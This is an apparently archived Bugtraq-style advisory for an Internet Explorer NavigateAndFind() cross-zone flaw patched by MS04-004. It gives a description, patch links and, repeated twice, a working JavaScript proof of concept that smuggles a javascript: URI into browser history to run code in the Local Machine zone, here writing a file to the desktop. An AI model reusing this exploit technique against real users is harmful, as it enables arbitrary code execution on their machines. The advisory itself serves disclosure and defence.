Microsoft Internet Explorer NavigateAndFind() Cross-Zone Policy Vulnerability
BID:9568
Info
Microsoft Internet Explorer NavigateAndFind() Cross-Zone Policy Vulnerability
| Bugtraq ID: | 9568 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 03 2004 12:00AM |
| Updated: | Feb 03 2004 12:00AM |
| Credit: | Discovery of this vulnerability has been credited to Andreas Sandblad <[email protected]>. |
| Vulnerable: |
Microsoft Internet Explorer 5.0.1 SP3 Microsoft Internet Explorer 5.0.1 SP2 Microsoft Internet Explorer 5.0.1 SP1 Microsoft Internet Explorer 5.0.1 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 Microsoft Internet Explorer 5.5 SP2 Microsoft Internet Explorer 5.5 SP1 Microsoft Internet Explorer 5.5 Microsoft Internet Explorer 5.0 |
| Not Vulnerable: | |
Discussion
Microsoft Internet Explorer NavigateAndFind() Cross-Zone Policy Vulnerability
A vulnerability has been reported in Microsoft Internet Explorer. Because of this, an attacker may be able to violate cross-zone policy.
It has been reported that the issue presents itself due to a failure by Internet Explorer to remove JavaScript URIs from the browser history list in some circumstances. A JavaScript specific JavaScript URI, can be embedded in the Browser history list and further employed by an attacker to have JavaScript code executed in the context of the Local Machine security zone.
This issue is similar in nature to the vulnerability described in BID 9109.
A vulnerability has been reported in Microsoft Internet Explorer. Because of this, an attacker may be able to violate cross-zone policy.
It has been reported that the issue presents itself due to a failure by Internet Explorer to remove JavaScript URIs from the browser history list in some circumstances. A JavaScript specific JavaScript URI, can be embedded in the Browser history list and further employed by an attacker to have JavaScript code executed in the context of the Local Machine security zone.
This issue is similar in nature to the vulnerability described in BID 9109.
Exploit / POC
Microsoft Internet Explorer NavigateAndFind() Cross-Zone Policy Vulnerability
The following proof of concept has been supplied:
// Andreas Sandblad, 2004-02-03, patched by MS04-004
// Name: payload
// Purpose: Run payload code called from Local Machine zone.
// The code may be arbitrary such as executing shell commands.
// This demo simply creates a harmless textfile on the desktop.
function payload() {
file = "sandblad.txt";
o = new ActiveXObject("ADODB.Stream");
o.Open();
o.Type=2;
o.Charset="ascii";
o.WriteText("You are vulnerable!");
o.SaveToFile(file, 2);
o.Close();
alert("File "+file+" created on desktop!");
}
// Name: trigger
// Purpose: Inject javascript url in history list and run payload
// function when the user hits the backbutton.
function trigger(len) {
if (history.length != len)
payload();
else
return "<title>-</title><body
onload=external.NavigateAndFind('res:','','')>";
}
// Name: backbutton
// Purpose: Run backbutton exploit.
function backbutton() {
location = 'javascript:'+trigger+payload+'trigger('+history.length+')';
}
// Launch backbutton exploit on load
if (confirm("Press OK to run backbutton exploit!"))
backbutton();
The following proof of concept has been supplied:
// Andreas Sandblad, 2004-02-03, patched by MS04-004
// Name: payload
// Purpose: Run payload code called from Local Machine zone.
// The code may be arbitrary such as executing shell commands.
// This demo simply creates a harmless textfile on the desktop.
function payload() {
file = "sandblad.txt";
o = new ActiveXObject("ADODB.Stream");
o.Open();
o.Type=2;
o.Charset="ascii";
o.WriteText("You are vulnerable!");
o.SaveToFile(file, 2);
o.Close();
alert("File "+file+" created on desktop!");
}
// Name: trigger
// Purpose: Inject javascript url in history list and run payload
// function when the user hits the backbutton.
function trigger(len) {
if (history.length != len)
payload();
else
return "<title>-</title><body
onload=external.NavigateAndFind('res:','','')>";
}
// Name: backbutton
// Purpose: Run backbutton exploit.
function backbutton() {
location = 'javascript:'+trigger+payload+'trigger('+history.length+')';
}
// Launch backbutton exploit on load
if (confirm("Press OK to run backbutton exploit!"))
backbutton();
Solution / Fix
Microsoft Internet Explorer NavigateAndFind() Cross-Zone Policy Vulnerability
Solution:
Microsoft has released a cumulative security update (MS04-004) to address this issue in affected versions of Microsoft Internet Explorer. Users are strongly advised to obtain fixes as soon as possible.
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 5.5 SP2
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP1
Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.0.1
Microsoft Internet Explorer 5.0.1 SP2
Solution:
Microsoft has released a cumulative security update (MS04-004) to address this issue in affected versions of Microsoft Internet Explorer. Users are strongly advised to obtain fixes as soon as possible.
Microsoft Internet Explorer 6.0 SP1
-
Microsoft Cumulative Security Update for Internet Explorer 6 Service Pack 1 (KB832894)
http://www.microsoft.com/downloads/details.aspx?FamilyId=70530968-B59A -47C0-90D3-0C884910BC97&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 6 SP1 64-bit Edition (KB832894)
For Internet Explorer 6 SP 1 running on Windows XP 64-bit platforms.
http://www.microsoft.com/downloads/details.aspx?FamilyId=326EFFDA-8D86 -4683-BC77-9BF410BC620D&displaylang=en
Microsoft Internet Explorer 5.5 SP2
-
Microsoft Cumulative Security Update for Internet Explorer 5.5 Service Pack 2 (KB832894)
http://www.microsoft.com/downloads/details.aspx?FamilyId=EFFE87F6-7ACA -4A54-B767-5597DDE95C6F&displaylang=en
Microsoft Internet Explorer 6.0
-
Microsoft Cumulative Security Update for Internet Explorer 6 (KB832894)
For Internet Explorer 6 running on Windows XP.
http://www.microsoft.com/downloads/details.aspx?FamilyId=BE0C18BC-7F9A -4196-BFDE-29EBA8CF7A50&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer for Windows Server 2003 (KB832894)
For Internet Explorer 6.0 running on Windows 2003.
http://www.microsoft.com/downloads/details.aspx?FamilyId=D78AE4F7-8852 -4A04-B8F6-1DE327E598F0&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer for Windows Server 2003 64-bit Edition (KB832894)
For Internet Explorer 6 running on Windows 2003 64-bit platforms.
http://www.microsoft.com/downloads/details.aspx?FamilyId=6A7894F0-789F -4152-9AE4-8DCB43404149&displaylang=en
Microsoft Internet Explorer 5.0.1 SP1
-
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 2 (KB832894)
For Internet Explorer 5.01 running on Windows 2000 Service Pack 2.
http://www.microsoft.com/downloads/details.aspx?FamilyId=17904608-DCEE -4C99-A780-81D6DBC48DD5&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 3 (KB832894)
For Internet Explorer 5.01 running on Windows 2000 SP 3.
http://www.microsoft.com/downloads/details.aspx?FamilyId=202D3AAC-6B56 -4F4A-8C0F-4183C77B6B51&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 4 (KB832894)
For Internet Explorer 5.01 running on Windows 2000 SP 4.
http://www.microsoft.com/downloads/details.aspx?FamilyId=F5E74139-6E0E -49FD-9AA2-36D2D8454A92&displaylang=en
Microsoft Internet Explorer 5.0.1 SP3
-
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 2 (KB832894)
For Internet Explorer 5.01 running on Windows 2000 Service Pack 2.
http://www.microsoft.com/downloads/details.aspx?FamilyId=17904608-DCEE -4C99-A780-81D6DBC48DD5&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 3 (KB832894)
For Internet Explorer 5.01 running on Windows 2000 SP 3.
http://www.microsoft.com/downloads/details.aspx?FamilyId=202D3AAC-6B56 -4F4A-8C0F-4183C77B6B51&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 4 (KB832894)
For Internet Explorer 5.01 running on Windows 2000 SP 4.
http://www.microsoft.com/downloads/details.aspx?FamilyId=F5E74139-6E0E -49FD-9AA2-36D2D8454A92&displaylang=en
Microsoft Internet Explorer 5.0.1
-
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 2 (KB832894)
For Internet Explorer 5.01 running on Windows 2000 Service Pack 2.
http://www.microsoft.com/downloads/details.aspx?FamilyId=17904608-DCEE -4C99-A780-81D6DBC48DD5&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 3 (KB832894)
For Internet Explorer 5.01 running on Windows 2000 SP 3.
http://www.microsoft.com/downloads/details.aspx?FamilyId=202D3AAC-6B56 -4F4A-8C0F-4183C77B6B51&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 4 (KB832894)
For Internet Explorer 5.01 running on Windows 2000 SP 4.
http://www.microsoft.com/downloads/details.aspx?FamilyId=F5E74139-6E0E -49FD-9AA2-36D2D8454A92&displaylang=en
Microsoft Internet Explorer 5.0.1 SP2
-
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 2 (KB832894)
For Internet Explorer 5.01 running on Windows 2000 Service Pack 2.
http://www.microsoft.com/downloads/details.aspx?FamilyId=17904608-DCEE -4C99-A780-81D6DBC48DD5&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 3 (KB832894)
For Internet Explorer 5.01 running on Windows 2000 SP 3.
http://www.microsoft.com/downloads/details.aspx?FamilyId=202D3AAC-6B56 -4F4A-8C0F-4183C77B6B51&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 4 (KB832894)
For Internet Explorer 5.01 running on Windows 2000 SP 4.
http://www.microsoft.com/downloads/details.aspx?FamilyId=F5E74139-6E0E -49FD-9AA2-36D2D8454A92&displaylang=en